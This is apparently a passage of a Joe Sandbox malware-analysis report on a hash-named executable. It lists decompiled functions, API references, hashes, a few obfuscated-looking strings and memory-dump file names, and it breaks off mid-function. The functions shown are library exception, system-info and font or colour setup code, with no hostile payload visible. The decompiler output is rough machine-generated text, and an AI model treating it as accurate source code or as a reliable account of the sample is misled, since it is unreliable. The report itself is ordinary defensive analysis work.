API ID: ExceptionException@8H_prolog3H_prolog3_RaiseThrow
String ID: AllocatorBase: requested size would cause integer overflow
API String ID: 1139647276-10355266
Opcode ID: 850f48b8441d1e722e76abd6564e6faa4749cc0a792e10005a0de49adfdeac3b
Instruction ID: 01728469658f788ecd88290bbee029d6dd7da2c67c9ab4eaa1255280d198a891
Opcode Fuzzy Hash: 850f48b8441d1e722e76abd6564e6faa4749cc0a792e10005a0de49adfdeac3b
Instruction Fuzzy Hash: 50E09A74C40318EACF00FBE0C802BEC77B4AF65316F802555F919BA0C1DBF08648C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00CA5C9D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E00CA5C9D() {
				void* _t9;
				void* _t15;

				_t9 = 0xe8c02a;
				0xe21503(0x44);
				if( *((intOrPtr*)(_t15 + 8)) > 0xffffffff) {
					E00CA1E2C(_t15 - 0x28, "AllocatorBase: requested size would cause integer overflow");
					 *(_t15 - 4) =  *(_t15 - 4) & 0x00000000;
					E00CA4197(_t15 - 0x50);
					_t9 = _t15 - 0x50;
					 *((intOrPtr*)(_t15 - 0x50)) = 0xe92ca8;
					0xe2143b(_t9, 0xee8078, 1, _t15 - 0x28);
				}
				0xe214b2();
				return _t9;
			}

0x00ca5c9f
0x00ca5ca4
0x00ca5cad
0x00ca5cb7
0x00ca5cbc
0x00ca5cc9
0x00ca5cd3
0x00ca5cd6
0x00ca5cde
0x00ca5cde
0x00ca5ce3
0x00ca5ce8

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA5CA4

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00CA5CDE

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

Strings

AllocatorBase: requested size would cause integer overflow, xrefs: 00CA5CAF

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ExceptionException@8H_prolog3H_prolog3_RaiseThrow
String ID: AllocatorBase: requested size would cause integer overflow
API String ID: 1139647276-10355266
Opcode ID: fd39d48ba2698574478e2eebd6f24edfbc02fca89015f1002eeb7175e13da129
Instruction ID: 5c4e0011142aaaf2df738b2c80c56a14248ca9c3534a613fce0f256d8d152cb6
Opcode Fuzzy Hash: fd39d48ba2698574478e2eebd6f24edfbc02fca89015f1002eeb7175e13da129
Instruction Fuzzy Hash: F2E06570940318AACF00FAE0D802ADC77B4AF64725F902255E929BA0C1CBB09748C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00CA5E62 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00CA5E62(intOrPtr* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				intOrPtr _t19;
				void* _t23;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t33;
				intOrPtr* _t36;
				void* _t38;

				0xe21503(0x44);
				 *((intOrPtr*)( *__ecx + 0x9c))();
				E00CA1E2C(_t38 - 0x28, "BufferedTransformation: this object is not attachable");
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t26 = _t38 - 0x50;
				E00CA4197(_t26);
				 *((intOrPtr*)(_t38 - 0x50)) = 0xe92cb4;
				0xe2143b(_t38 - 0x50, 0xee8098, 0, _t38 - 0x28);
				asm("int3");
				_t36 = _t26;
				_t19 = 0;
				_t28 =  *_t36 - 0x10;
				_t33 =  *_t28;
				if( *((intOrPtr*)(_t28 + 4)) != 0) {
					if( *((intOrPtr*)(_t28 + 0xc)) >= 0) {
						E00CA656C(_t28, __edx);
						_t19 =  *((intOrPtr*)( *_t33 + 0xc))() + 0x10;
						 *_t36 = _t19;
					} else {
						_t19 = E00CA669E(_t23, _t36, _t33, 0);
					}
				}
				return _t19;
			}

0x00ca5e69
0x00ca5e70
0x00ca5e7e
0x00ca5e83
0x00ca5e8d
0x00ca5e90
0x00ca5e9d
0x00ca5ea5
0x00ca5eaa
0x00ca5eac
0x00ca5eae
0x00ca5eb3
0x00ca5eb6
0x00ca5ebb
0x00ca5ec0
0x00ca5ecc
0x00ca5ed8
0x00ca5edb
0x00ca5ec2
0x00ca5ec5
0x00ca5ec5
0x00ca5ec0
0x00ca5edf

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA5E69

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00CA5EA5

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

Strings

BufferedTransformation: this object is not attachable, xrefs: 00CA5E76

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ExceptionException@8H_prolog3H_prolog3_RaiseThrow
String ID: BufferedTransformation: this object is not attachable
API String ID: 1139647276-3944187330
Opcode ID: da97efa9cafebcd71e008122a8657a66c01313183c6134caaeabcf084ace1740
Instruction ID: 7fa9b092a930615919e3df53e0f8883696a42a85677e1a614f5a604b4d09afad
Opcode Fuzzy Hash: da97efa9cafebcd71e008122a8657a66c01313183c6134caaeabcf084ace1740
Instruction Fuzzy Hash: FEE01A70950218EBDF04EBE0C84AFDC77B8AF54304F502468F609BA191DBB05A09CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00CA5D7B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00CA5D7B(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v4;
				char _v40;
				char _v80;

				0xe21503(0x44);
				E00CA1E2C( &_v40, "Clone() is not implemented yet.");
				_v4 = _v4 & 0x00000000;
				E00CA4197( &_v80);
				_v80 = 0xe92cb4;
				0xe2143b( &_v80, 0xee8098, 0,  &_v40);
				asm("int3");
				_t18 = _v4;
				if(_v4 == 0xffffffff) {
					_t18 = E00CA67CE(_a12) + 1;
				}
				return E00CAB1AA(_t18, _a4, _a8, _a12, _t18);
			}

0x00ca5d82
0x00ca5d8f
0x00ca5d94
0x00ca5da1
0x00ca5dae
0x00ca5db6
0x00ca5dbb
0x00ca5dbf
0x00ca5dc5
0x00ca5dd0
0x00ca5dd0
0x00ca5de4

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA5D82

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00CA5DB6

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

Strings

Clone() is not implemented yet., xrefs: 00CA5D87

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ExceptionException@8H_prolog3H_prolog3_RaiseThrow
String ID: Clone() is not implemented yet.
API String ID: 1139647276-226299721
Opcode ID: 446b446183e82ba2907f171d43a09fb02d34bb54700e54d0ff93b01fd0b7e108
Instruction ID: 49e1bcfcf783cbf968383f4a6ea520966fed2ede81621b70fbd4a045b8ece8f6
Opcode Fuzzy Hash: 446b446183e82ba2907f171d43a09fb02d34bb54700e54d0ff93b01fd0b7e108
Instruction Fuzzy Hash: D7E0B67495021CAADF04EBE0C856BDDB7B8AB64705F502458E605B6181DBB05A08C621

Uniqueness

Uniqueness Score: -1.00%

Function 00CA1C8C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00CA1C8C(void* __eax) {
				void* _t2;
				void* _t7;

				0xe29150(0xed1360);
				_t2 = E00CA24AE(0xf03b2c, _t7, 0xed1360, __eax);
				0xe20d99(0xe8db5e);
				return _t2;
			}

0x00ca1c93
0x00ca1ca0
0x00ca1caa
0x00ca1cb1

APIs

_strlen.LIBCMT ref: 00CA1C93

Strings

AAD, xrefs: 00CA1C9B
AAD, xrefs: 00CA1C8D, 00CA1C92, 00CA1C9A

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: _strlen
String ID: AAD$AAD
API String ID: 4218353326-3502023328
Opcode ID: ea8015a7b96da6ffebf2ae0e94d5872de054aeaca68478615548374634d9fc88
Instruction ID: 7b78ce67753533f965e98179a0fa5f395a4a5bc24dc9f01bb6adec7e388ff57c
Opcode Fuzzy Hash: ea8015a7b96da6ffebf2ae0e94d5872de054aeaca68478615548374634d9fc88
Instruction Fuzzy Hash: 80C04C5661A6393D150431E87C179AA028DDD863647132067F408766C35C812D4161B9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 38b2c7a1af454d382927f81543d86055886bc02863457.exePID: 1812, Parent PID: 3324COMMON

Execution Graph

Execution Coverage:	8.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	51

Executed Functions

Function 00CACD24 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 489
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00CACE58
_memset.LIBCMT ref: 00CACE78

Strings

JdmAm^jnak, xrefs: 00CACE2B
HU~{Fhainz|, xrefs: 00CACD52
T, xrefs: 00CAD2A8
wcwi`xTckh, xrefs: 00CAD1D3
Kgjm, xrefs: 00CACE09

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: _memset
String ID: HU~{Fhainz|$JdmAm^jnak$Kgjm$T$wcwi`xTckh
API String ID: 2102423945-1427305012
Opcode ID: d2f593253948ad5afb8a0d423e4806d113904bf8195c2f9e8b0591e14ddc5dc3
Instruction ID: 098a4e68b2ac1bb3b69f9c69ce7d6e66dd11d598a307a0e0a810fbdbb5287943
Opcode Fuzzy Hash: d2f593253948ad5afb8a0d423e4806d113904bf8195c2f9e8b0591e14ddc5dc3
Instruction Fuzzy Hash: A2F17FB194121ABEEF229B64DC4AFFFBBBCEF06350F1041A9B519A6181D6705F418B60

Uniqueness

Uniqueness Score: -1.00%

Function 00CFCB30 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CFCB30(void* __eflags) {
				signed int _t9;

				_t9 = 9;
				memset(0xf0afd4, 0, _t9 << 2);
				GetSystemInfo(0xf0afd4); // executed
				E00CBBC76(0xf0afd4, 0xf00e78, 1);
				E00CBBC76(0xf0afd4, 0xf00ed0, 0);
				E00CBBC76(0xf0afd4, 0xf00f28, 0);
				E00CBBC76(0xf0afd4, 0xf00f80, 0);
				return 0;
			}

0x00cfcb3a
0x00cfcb3d
0x00cfcb40
0x00cfcb4d
0x00cfcb59
0x00cfcb65
0x00cfcb71
0x00cfcb7c

APIs

GetSystemInfo.KERNEL32(00F0AFD4,00000000,00CFCABF), ref: 00CFCB40

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 936df25aa1f275711c05d5b1bee07ceeb4bd01a8e3daa1b40ffdd35469e8294c
Instruction ID: d200e0b06e2165952972a936a7991edd2d026f076e5e785a298838bb22116e3f
Opcode Fuzzy Hash: 936df25aa1f275711c05d5b1bee07ceeb4bd01a8e3daa1b40ffdd35469e8294c
Instruction Fuzzy Hash: 2FE0ECB27C430175E3B476BAAD8BF99144197A4F42F208421F204751CADFD1C4013117

Uniqueness

Uniqueness Score: -1.00%

Function 00D3347C Relevance: 72.1, APIs: 36, Strings: 5, Instructions: 382
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00D3347C(intOrPtr* __ecx, signed int __edx, struct tagLOGFONTW __fp0) {
				signed char _t238;
				void* _t239;
				void* _t240;
				void* _t241;
				void* _t242;
				void* _t243;
				void* _t244;
				void* _t245;
				void* _t246;
				void* _t247;
				void* _t248;
				struct tagLOGFONTW _t257;
				signed int _t264;
				struct HFONT__* _t289;
				void* _t291;
				long _t304;
				struct tagLOGFONTW _t305;
				long _t306;
				intOrPtr _t307;
				long _t310;
				long _t311;
				long _t312;
				long _t313;
				long _t314;
				long _t315;
				long _t320;
				long _t330;
				long _t331;
				struct HBRUSH__* _t332;
				struct HBRUSH__* _t333;
				struct HBRUSH__* _t335;
				struct HBRUSH__* _t337;
				struct HPEN__* _t358;
				void* _t372;
				long _t395;
				long _t397;
				struct tagLOGFONTW _t400;
				void* _t402;
				struct HFONT__* _t415;
				int _t418;
				int _t419;
				WCHAR* _t420;
				char _t446;
				intOrPtr _t447;
				signed char _t449;
				intOrPtr* _t465;
				signed int _t515;
				struct tagLOGFONTW _t518;
				intOrPtr _t523;
				intOrPtr* _t524;
				intOrPtr* _t525;
				struct tagLOGFONTW _t526;
				struct tagLOGFONTW _t539;
				void* _t545;
				signed long long _t582;

				_t515 = __edx;
				0xe21503(0x478);
				_t525 = __ecx;
				_push(0);
				E00D19FA4(_t545 - 0x484);
				 *(_t545 - 4) = 0;
				_t238 = GetDeviceCaps( *(_t545 - 0x47c), 0x58);
				 *(_t545 - 0x460) = _t238;
				asm("fild dword [ebp-0x460]");
				 *(_t545 - 0x460) = __fp0;
				_t582 =  *(_t545 - 0x460) /  *0xea5308;
				asm("fst qword [esi+0x1dc]");
				asm("fld1");
				asm("fcom st0, st1");
				asm("fnstsw ax");
				if((_t238 & 0x00000005) != 0) {
					st1 = _t582;
					L4:
					st0 = _t582;
				} else {
					_t582 =  *0xea52f8;
					asm("fcomp st0, st2");
					asm("fnstsw ax");
					st1 = _t582;
					if((_t238 & 0x00000041) != 0) {
						goto L4;
					} else {
						 *(_t525 + 0x1dc) = _t582;
					}
				}
				_t239 = _t525 + 0x11c;
				if(_t239 != 0 &&  *((intOrPtr*)(_t239 + 4)) != 0) {
					DeleteObject(E00D1AA2D(0, _t239, _t515));
				}
				_t240 = _t525 + 0x124;
				if(_t240 != 0 &&  *((intOrPtr*)(_t240 + 4)) != 0) {
					DeleteObject(E00D1AA2D(0, _t240, _t515));
				}
				_t241 = _t525 + 0x12c;
				if(_t241 != 0 &&  *((intOrPtr*)(_t241 + 4)) != 0) {
					DeleteObject(E00D1AA2D(0, _t241, _t515));
				}
				_t242 = _t525 + 0x134;
				if(_t242 != 0 &&  *((intOrPtr*)(_t242 + 4)) != 0) {
					DeleteObject(E00D1AA2D(0, _t242, _t515));
				}
				_t243 = _t525 + 0x13c;
				if(_t243 != 0 &&  *((intOrPtr*)(_t243 + 4)) != 0) {
					DeleteObject(E00D1AA2D(0, _t243, _t515));
				}
				_t244 = _t525 + 0x144;
				if(_t244 != 0 &&  *((intOrPtr*)(_t244 + 4)) != 0) {
					DeleteObject(E00D1AA2D(0, _t244, _t515));
				}
				_t245 = _t525 + 0x14c;
				if(_t245 != 0 &&  *((intOrPtr*)(_t245 + 4)) != 0) {
					DeleteObject(E00D1AA2D(0, _t245, _t515));
				}
				_t246 = _t525 + 0x154;
				if(_t246 != 0 &&  *((intOrPtr*)(_t246 + 4)) != 0) {
					DeleteObject(E00D1AA2D(0, _t246, _t515));
				}
				_t247 = _t525 + 0x164;
				if(_t247 != 0 &&  *((intOrPtr*)(_t247 + 4)) != 0) {
					DeleteObject(E00D1AA2D(0, _t247, _t515));
				}
				_t248 = _t525 + 0x15c;
				if(_t248 != 0 &&  *((intOrPtr*)(_t248 + 4)) != 0) {
					DeleteObject(E00D1AA2D(0, _t248, _t515));
				}
				 *((intOrPtr*)(_t545 - 0x264)) = 0x1f8;
				E00D32F84(_t525, _t545 - 0x264); // executed
				0xe23f30(_t545 - 0x6c, 0, 0x5c);
				 *((char*)(_t545 - 0x55)) = GetTextCharsetInfo( *(_t545 - 0x480), 0, 0);
				 *(_t545 - 0x5c) =  *(_t545 - 0x174);
				 *((char*)(_t545 - 0x58)) =  *((intOrPtr*)(_t545 - 0x170));
				asm("cdq");
				_t257 = ( *(_t545 - 0x184) ^ _t515) - _t515;
				if(_t257 > 0xc) {
					__eflags =  *(_t525 + 8);
					if( *(_t525 + 8) == 0) {
						_t257 = _t257 - 1;
						__eflags = _t257;
					}
				} else {
					_t257 = 0xb;
				}
				if( *(_t545 - 0x184) < 0) {
					_t257 =  ~_t257;
				}
				 *(_t545 - 0x6c) = _t257;
				lstrcpyW(_t545 - 0x50, _t545 - 0x168);
				if( *((intOrPtr*)(_t525 + 4)) == 0 &&  *((char*)(_t545 - 0x16d)) <= 2) {
					_t418 = EnumFontFamiliesW( *(_t545 - 0x480), 0, 0xd32e22, L"Segoe UI"); // executed
					if(_t418 != 0) {
						_t419 = EnumFontFamiliesW( *(_t545 - 0x480), 0, 0xd32e22, L"Tahoma");
						__eflags = _t419;
						_t420 = _t545 - 0x50;
						if(_t419 != 0) {
							_push(L"MS Sans Serif");
						} else {
							_push(L"Tahoma");
						}
						lstrcpyW(_t420, ??);
					} else {
						lstrcpyW(_t545 - 0x50, L"Segoe UI");
						 *((char*)(_t545 - 0x52)) = 5;
					}
				}
				_t445 =  *0xe8e0ac;
				E00D1A8DA( *0xe8e0ac, _t525 + 0x11c, _t515, CreateFontIndirectW(_t545 - 0x6c));
				_t264 =  *(_t545 - 0x6c);
				 *(_t545 - 0x460) = _t264;
				0xe296c6(_t264);
				 *(_t545 - 0x46c) = _t264;
				asm("fild dword [ebp-0x46c]");
				 *(_t545 - 0x470) = _t582;
				asm("fld1");
				asm("faddp st1, st0");
				0xe296e0();
				 *(_t545 - 0x6c) = _t264;
				if( *(_t545 - 0x460) < 0) {
					 *(_t545 - 0x6c) =  ~_t264;
				}
				E00D1A8DA(_t445, _t525 + 0x15c, _t515, CreateFontIndirectW(_t545 - 0x6c));
				 *(_t545 - 0x6c) =  *(_t545 - 0x460);
				 *((intOrPtr*)(_t545 - 0x45c)) = 0x1f8;
				E00D32F84(_t525, _t545 - 0x45c);
				 *((char*)(_t545 - 0x58)) =  *((intOrPtr*)(_t545 - 0x30c));
				 *(_t545 - 0x5c) =  *(_t545 - 0x310);
				E00D1A8DA(_t445, _t525 + 0x124, _t515, CreateFontIndirectW(_t545 - 0x6c));
				 *((char*)(_t545 - 0x58)) =  *((intOrPtr*)(_t545 - 0x170));
				 *(_t545 - 0x5c) =  *(_t545 - 0x174);
				 *((char*)(_t545 - 0x57)) = 1;
				E00D1A8DA(_t445, _t525 + 0x13c, _t515, CreateFontIndirectW(_t545 - 0x6c));
				 *((char*)(_t545 - 0x57)) = 0;
				 *(_t545 - 0x5c) = 0x2bc;
				E00D1A8DA(_t445, _t525 + 0x12c, _t515, CreateFontIndirectW(_t545 - 0x6c));
				_t446 =  *((intOrPtr*)(_t545 - 0x55));
				 *(_t545 - 0x5c) =  *(_t545 - 0x5c) & 0x00000000;
				 *((char*)(_t545 - 0x55)) = 2;
				 *(_t545 - 0x6c) = GetSystemMetrics(0x48) - 1;
				lstrcpyW(_t545 - 0x50, L"Marlett");
				_t289 = CreateFontIndirectW(_t545 - 0x6c);
				_t461 = _t525 + 0x164;
				E00D1A8DA(_t446, _t525 + 0x164, _t515, _t289);
				 *(_t545 - 0x464) =  *(_t545 - 0x464) & 0x00000000;
				 *((char*)(_t545 - 0x55)) = _t446;
				 *((intOrPtr*)(_t545 - 0x468)) = 0xea0394;
				 *(_t545 - 4) = 1;
				_t291 = GetStockObject(0x11);
				_t447 =  *0xe8e170;
				 *(_t545 - 0x464) = _t291;
				if(_t291 != 0) {
					_t461 = _t545 - 0x6c;
					if(GetObjectW(_t291, 0x5c, _t545 - 0x6c) != 0) {
						 *(_t545 - 0x6c) =  *(_t545 - 0x184);
						 *(_t545 - 0x5c) =  *(_t545 - 0x174);
						 *((char*)(_t545 - 0x58)) =  *((intOrPtr*)(_t545 - 0x170));
						 *((intOrPtr*)(_t545 - 0x60)) = 0x384;
						 *((intOrPtr*)(_t545 - 0x64)) = 0xa8c;
						lstrcpyW(_t545 - 0x50, L"Arial");
						E00D1A8DA(_t447, _t525 + 0x14c, _t515, CreateFontIndirectW(_t545 - 0x6c));
						 *((intOrPtr*)(_t545 - 0x64)) = 0x384;
						_t415 = CreateFontIndirectW(_t545 - 0x6c);
						_t461 = _t525 + 0x154;
						E00D1A8DA(_t447, _t525 + 0x154, _t515, _t415);
					}
				}
				GetObjectW( *(E00D1AB49(_t447, _t461, _t515, _t525, GetStockObject(0x11)) + 4), 0x5c, _t545 - 0x6c);
				 *((char*)(_t545 - 0x57)) = 1;
				E00D1A8DA(_t447, _t525 + 0x144, _t515, CreateFontIndirectW(_t545 - 0x6c));
				 *((char*)(_t545 - 0x57)) = 0;
				 *(_t545 - 0x5c) = 0x2bc;
				E00D1A8DA(_t447, _t525 + 0x134, _t515, CreateFontIndirectW(_t545 - 0x6c));
				_t465 = _t525; // executed
				E00D33D53(_t465, _t515);
				_t526 =  *0xf0e17c; // 0x0
				while(_t526 != 0) {
					_t518 = _t526;
					__eflags = _t526;
					if(_t526 == 0) {
						L61:
						E00D0BD09(_t465);
						asm("int3");
						0xe214d0(0x24);
						_t448 = _t465;
						 *((intOrPtr*)(_t545 - 0x14)) = _t448;
						_t304 = GetSysColor(0x16);
						__eflags = _t304 - 0xffffff;
						if(_t304 != 0xffffff) {
							L65:
							_t305 = 0;
							__eflags = 0;
						} else {
							_t397 = GetSysColor(0xf);
							__eflags = _t397;
							if(_t397 != 0) {
								goto L65;
							} else {
								_t305 = _t397 + 1;
							}
						}
						 *(_t448 + 0x184) = _t305;
						_t306 = GetSysColor(0x15);
						__eflags = _t306;
						if(_t306 != 0) {
							L69:
							_t307 = 0;
							__eflags = 0;
						} else {
							_t395 = GetSysColor(0xf);
							__eflags = _t395 - 0xffffff;
							if(_t395 != 0xffffff) {
								goto L69;
							} else {
								_t307 = 1;
							}
						}
						_push(0);
						 *((intOrPtr*)(_t448 + 0x188)) = _t307;
						E00D19FA4(_t545 - 0x30);
						 *(_t545 - 4) =  *(_t545 - 4) & 0x00000000;
						 *((intOrPtr*)(_t448 + 0x1ac)) = GetDeviceCaps( *(_t545 - 0x28), 0xc);
						_t310 = GetSysColor(0xf);
						 *(_t448 + 0x1c) = _t310;
						 *(_t448 + 0x54) = _t310;
						_t311 = GetSysColor(0x10);
						 *(_t448 + 0x20) = _t311;
						 *(_t448 + 0x58) = _t311;
						_t312 = GetSysColor(0x15);
						 *(_t448 + 0x30) = _t312;
						 *(_t448 + 0x60) = _t312;
						_t313 = GetSysColor(0x16);
						 *(_t448 + 0x34) = _t313;
						 *(_t448 + 0x64) = _t313;
						_t314 = GetSysColor(0x14);
						 *(_t448 + 0x24) = _t314;
						 *(_t448 + 0x5c) = _t314;
						_t315 = GetSysColor(0x12);
						 *(_t448 + 0x28) = _t315;
						 *(_t448 + 0x68) = _t315;
						 *((intOrPtr*)(_t448 + 0x38)) = GetSysColor(0x11);
						 *((intOrPtr*)(_t448 + 0x2c)) = GetSysColor(6);
						 *(_t448 + 0x3c) = GetSysColor(0xd);
						 *((intOrPtr*)(_t448 + 0x40)) = GetSysColor(0xe);
						_t320 = GetSysColor(5);
						 *(_t448 + 0x6c) = _t320;
						 *(_t448 + 0x50) = _t320;
						 *(_t448 + 0x70) = GetSysColor(8);
						 *((intOrPtr*)(_t448 + 0x74)) = GetSysColor(9);
						 *((intOrPtr*)(_t448 + 0x78)) = GetSysColor(7);
						 *(_t448 + 0x7c) = GetSysColor(2);
						 *(_t448 + 0x80) = GetSysColor(3);
						 *((intOrPtr*)(_t448 + 0x88)) = GetSysColor(0x1b);
						 *((intOrPtr*)(_t448 + 0x8c)) = GetSysColor(0x1c);
						 *((intOrPtr*)(_t448 + 0x90)) = GetSysColor(0xa);
						 *((intOrPtr*)(_t448 + 0x94)) = GetSysColor(0xb);
						_t330 = GetSysColor(0x13);
						__eflags =  *(_t448 + 0x184);
						 *(_t448 + 0x84) = _t330;
						if( *(_t448 + 0x184) == 0) {
							_t331 = GetSysColor(0x1a);
							 *(_t448 + 0x48) = 0xff0000;
							 *(_t448 + 0x4c) = 0x800080;
						} else {
							_t331 =  *(_t448 + 0x70);
							 *(_t448 + 0x48) = _t331;
							 *(_t448 + 0x4c) = _t331;
						}
						 *(_t448 + 0x44) = _t331;
						_t332 = GetSysColorBrush(0x10);
						 *(_t448 + 0x14) = _t332;
						__eflags = _t332;
						_t468 = 0 | __eflags != 0x00000000;
						if(__eflags == 0) {
							L74:
							E00D0BD09(_t468);
						}
						_t333 = GetSysColorBrush(0x14);
						 *(_t448 + 0x10) = _t333;
						__eflags = _t333;
						_t468 = 0 | __eflags != 0x00000000;
						if(__eflags == 0) {
							goto L74;
						}
						_t335 = GetSysColorBrush(5);
						 *(_t448 + 0x18) = _t335;
						__eflags = _t335;
